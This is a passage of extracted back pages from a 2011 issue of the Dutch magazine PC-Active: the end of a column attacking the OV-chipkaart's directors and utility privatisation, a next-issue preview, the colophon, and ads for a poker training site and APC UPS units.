plek met de juiste
snelheid en invalshoek te raken. Me dunkt, het is nu toch wel ruimschoots en meermalen aangetoond dat er grove en domme fouten zijn gemaakt in deze al bijna twintig jaar durende soap, dat tijdige waarschuwingen over de kwetsbaarheid van het systeem keer op keer in de wind geslagen zijn. Of het nu onkunde of domheid is, kan mij niets meer schelen, de manier waarop drie duurbetaalde directeuren hun verantwoordelijkheid ontlopen is ten hemel schreiend. Ter illustratie, in 2009 lag TLS ook al onder vuur, maar streek het leidend driemanschap vrolijk tezamen € 672.000 op – publiek geld! Grove graaiers. Dat soort beloningen en bonussen wordt altijd weer verdedigd onder het mom dat op dergelijke posities het afbreukrisico hoog zou zijn, maar wanneer is de laatste keer dat we een falende graaier zijn of haar biezen hebben zien pakken? En – ook aardig – waarom gaat de politiek niet tegen dit wangedrag in? Misschien omdat de ex-politieke oude krokodillen in vergelijkbare circuits vergelijkbare bedragen wensen op te strijken? Je zou er zowat pissig van worden. Zo’n dertig jaar geleden werd het opeens bon ton in Europa om allerlei nutsbedrijven te verzelfstandigen. De concurrentie zou de kwaliteit van de dienstverlening verhogen en tegelijkertijd de kosten verlagen. Veel beter voor de burger dan al die ingedutte staatsbedrijven, waar ambtenaren en semi-ambtenaren van hun baan verzekerd maar wat zaten te dommelen. Wat zal ik zeggen, nu we de laatste tien jaar het resultaat van deze domme dagdroom van waanvan-de-dag politiekertjes hebben aanschouwd, in steeds vollere glorie. De postkantoren sluiten. Mobiel telefoneren in het buitenland kost een godsvermogen. Openbaar vervoer wordt duurder en duurder, met een uitgeklede dienstregeling die bij de eerste vlok sneeuw al in het honderd loopt. De salarissen en bonussen van de godenzonen die dit alles bestieren, worden onbetaalbaar. Dat alles is het resultaat van de tucht van de markt? Sta mij toe eerder te willen spreken van de klucht van de markt. En hop, tijd voor het volgende vogeltje. Of zou politiek Den Haag zijn verantwoordelijk nou echt nooit nemen?
PC-ACTIVE | Nr. 245 – 2011
205 wammes.indd 97
97
10-02-2011 14:31:07
VOLGENDE NUMMER
11x voor
In het volgend nummer komen onder meer de volgende onderwerpen aan bod (onder voorbehoud):
€ 42,50
Teksteditors voor programmeurs Teksteditors zijn onontbeerlijk voor de serieuze softwareontwikkelaar. Er zijn heel wat gratis titels beschikbaar, maar hoe pikt u er de juiste uit? We bekijken twee populaire programma’s.
OP CD: GRATIS EN COMPLETE VERSIE: BOOSTSPEED 5 SE T.W.V. € 49,95 PC-ACTIVE | FEBRUARI 2011
GRATIS REIZEN KAN Beveiliging chipkaart werkt niet
16
WINDOWS 7 INSTALLEREN OP MAAT Met patches en tools
44
244 JAARGANG 23 | 2011
QNAP TS-259 PRO+
20
Atom-nas draait ook Windows
3 TB HARDE SCHIJF
34
Veel ruimte, oude problemen!
HET LAB
94
OV-CHIPKAART BLIJFT ONVEILIG | INTEL SANDY BRIDGE | WINDOWS 7 OP MAAT | 3 TB SCHIJF
VERBORGEN DATA: ADOBE GEBRUIKT ROOTKIT OP HARDDISK
107 volgende keer.indd 98
17-01-2011 10:03:59
Surf naar www.hubstore.nl/pc-active
Neem een kortingsabonnement!
GEEN ENKEL NUMMER VAN PC-ACTIVE MISSEN?
100 Cover 244.indd 1
TrueCrypt Encryptie is handig, maar soms kan alleen al het feit dat u encryptie gebruikt u in de problemen brengen. Dan zou het fijn zijn als u deze versleutelde bestanden kon verbergen. We tonen u in dit artikel hoe u dit doet met het gratis programma TrueCrypt.
COLOFON
Dit tijdschrift is een uitgave van PC-Active BV en verschijnt 11 maal per jaar, compleet met cd
HOOFDREDACTEUR: Rob Coenraads REDACTIE: Rick van Eeden (adjunct-hoofdredacteur / eindredacteur), Mark Gamble (coördinator cd-rom / web), Henk van de Kamer (technisch redacteur), Eric van der Woude (eindredacteur), VORMGEVING: Daniel Amoako FOTOGRAFIE: Ton Bloetjes (Bloonie Fotografie) MEDEWERKERS: Pieter-Cornelis Avonts, Koen Crijns, Frank Everaardt, Frederick Gordts, Hans Niepoth, Jan Roza, Ronald Smit, Filip Vervloesem, Koen Vervloesem, Brenno de Winter en Wammes Witkop UITGEVER: Martin Smelt TRAFFIC: Marco Verhoog MEDIACONTROLLER: Bob Bottelier, Mirella van der Willik BOEKHOUDING: Geeta Hobo, René de Muijnck, Irene Prass MARKETING: Miranda Mettes (manager), Judith Sturk REDACTIEADRES: PC-Active, Postbus 3389, 2001 DJ Haarlem Telefoon 023-543 00 00, Fax 023-535 96 27, www.pc-active.nl Over de inhoud van blad en cd-rom: E-mail: [email protected] Persberichten per e-mail: [email protected] ADVERTENTIE-EXPLOITATIE: HUB Uitgevers Aart van der Giezen Postbus 3389 2001 DJ Haarlem E-mail [email protected] Telefoon 023-543 00 24 Fax 023-535 96 27
ISSN 0925-5745 Uiterste zorg wordt besteed aan het vervaardigen van PC-Active. Desondanks zijn fouten niet uit te sluiten. De uitgever kan derhalve niet aansprakelijk worden gesteld voor eventuele fouten in artikelen, programma’s of advertenties. Overname van artikelen of andere redactionele bijdragen is slechts toegestaan na voorafgaande schriftelijke toestemming van de uitgever. Tenzij uitdrukkelijk anders is overeengekomen heeft de redactie het recht om vrijelijk te beschikken over alle haar toegezondenmateriaal. ABONNEMENTEN: Ingrid van der Aar, Tanja Ekel, Marja Haakmeester VOOR VRAGEN OVER UW ABONNEMENT OF DOORGEVEN VAN ADRESWIJZIGINGEN PC-Active T.a.v. abonnementenadministratie Postbus 3389, 2001 DJ Haarlem E-mail: [email protected] Fax: 023 - 545 18 43 Telefoon op werkdagen tussen 10 en 14 uur: 023 – 536 44 01 OPGEVEN VAN EEN ABONNEMENT OF NABESTELLEN VAN OUDE NUMMERS KAN VIA DE WEBSITE: WWW.HUBSTORE.NL PC-Active verschijnt 11 maal per jaar en een jaarabonnement kost € 66 (België: € 71,50). Een abonnement kan op elk moment ingaan en wordt automatisch voor eenzelfde periode verlengd, tenzij er twee maanden voor vervaldatum schriftelijk wordt opgezegd.
00.000 r dan 4.0 e e m t e M d is ereldwij otste leden w m de gro nity o .c y g e t a u PokerStr kercomm ol en po o h c s r e k po
Word een succesvolle pokerspeler De beste pokeropleiding – geheel gratis! Honderden artikelen en video‘s in het Nederlands Persoonlijk advies van pokerpro‘s Haal de quiz en krijg $50 gratis startkapitaal!
Leerzame video‘s
20 vragen over onze strategie – geen voorkennis nodig $50 op een pokerroom naar keuze (PartyPoker, Full Tilt, PokerStars, …) Word lid van onze grote community! Kom in contact met andere spelers, beginners en pokerpro‘s
Strategie en informatie
Discussieer over poker in onze grote forums
PokerStrategy.com is de grootste online pokercommunity ter wereld met meer dan 4 miljoen leden en honderden professionele pokercoaches. Ons doel is om mensen bekend te maken met poker: een uitdagend, strategisch en leuk spel. 220 vaste werknemers en een forum met dagelijks 20.000 posts in 18 talen maken PokerStrategy.com tot de meest innovatieve en levendige pokercommunity in de wereld.
De grootste pokercommunity
PokerStrategy.com BEST POKER AFFILIATE IGB AFFILIATE AWARDS 2010
Live coachingsessies
Klaar om met je pokercarrière te beginnen? Meld je nu aan. Het is helemaal gratis!
www.pokerstrategy.com Kom in contact met andere spelers
Untitled-1 1
10-2-2011 8:49: 23
Met een APC Back-UPS gaat uw digitale leven gewoon door...
zelfs wanneer de stroom uitvalt. Bescherm alles van waarde. Betrouwbare noodstroomvoorziening voor een beschikbaarheid van 24/7 Het maakt niet uit of u net uw favoriete programma aan het opnemen bent of uw Hyves-pagina bijwerkt. U wilt 24 uur per dag en 7 dagen per week blindelings kunnen vertrouwen op de consumentenelektronica in uw woning. Om die reden heeft APC by Schneider ElectricTM backupsystemen met een batterij ontwikkeld die de constante beschikbaarheid en connectiviteit garanderen die u verwacht…en waar u op vertrouwt.
Geruststellende bescherming op twee niveaus
Bescherm uw apparatuur en verlaag uw energieverbruik! ES-serie
De modellen uit de ES-serie zijn zeer populair omdat u voor een economisch verantwoord bedrag beschikt over een UPS die ervoor zorgt dat uw apparatuur gewoon blijft werken als de stroom gedurende korte of iets langere tijd uitvalt. Enkele stroombesparende modellen beschikken over een ontwerp met functies voor het actief verlagen van de energiekosten.
Wanneer de stroom uitvalt, gaan onze populaire Back-UPSTM-units aan het werk. Al uw elektronische apparatuur wordt direct overgezet naar noodstroom, zodat u tijdens korte stroomstoringen gewoon kunt doorwerken of uw apparatuur veilig kunt afsluiten. U voorkomt zo dat er belangrijke bestanden verloren gaan, zoals digitale foto’s en mediabibliotheken. De UPS-units bevatten tevens een spanningsbeveiliging, zodat de elektronische circuits van uw apparatuur en uw gegevens niet beschadigd raken door ‘ongeregelde’ spanning en piekspanningen.
De energiezuinige ES-serie
Energiebesparende bescherming voor alles wat van waarde is
• 8 stopcontacten • 405 watt / 700 VA • Maximale gebruikstijd van 70 minuten • Bescherming van telefoon/netwerk
Onze Back-UPS-units zijn geschikt voor de bescherming van diverse producten in uw woning. En aangezien we nu energiezuinige modellen aanbieden die de elektriciteitskosten verlagen door stroombesparende stekkerdozen, kunt u nu echt energie besparen, ongeacht de toepassingen die u aansluit. De nieuwe APC Back-UPS levert de kostenbesparende bescherming die ervoor zorgt dat u altijd beschikt over een betrouwbare stroomvoorziening en optimaal beschermd bent tegen onverwachte piekspanningen. Daarnaast voorkomt de unit dat de aangesloten apparatuur energie verspilt door lekstroom zo veel mogelijk tegen te gaan.
De nieuwe ES is voorzien van innovatieve, energiebesparende stopcontacten. Deze stopcontacten blokkeren automatisch de stroomtoevoer naar ongebruikte apparaten wanneer deze zijn uitgeschakeld of in de slaapstand staan. U voorkomt zo nutteloos energieverbruik.
ES 700G
ES 550G
• 8 stopcontacten • 330 watt / 550 VA • Maximale gebruikstijd van 43 minuten • Bescherming van telefoon/netwerk
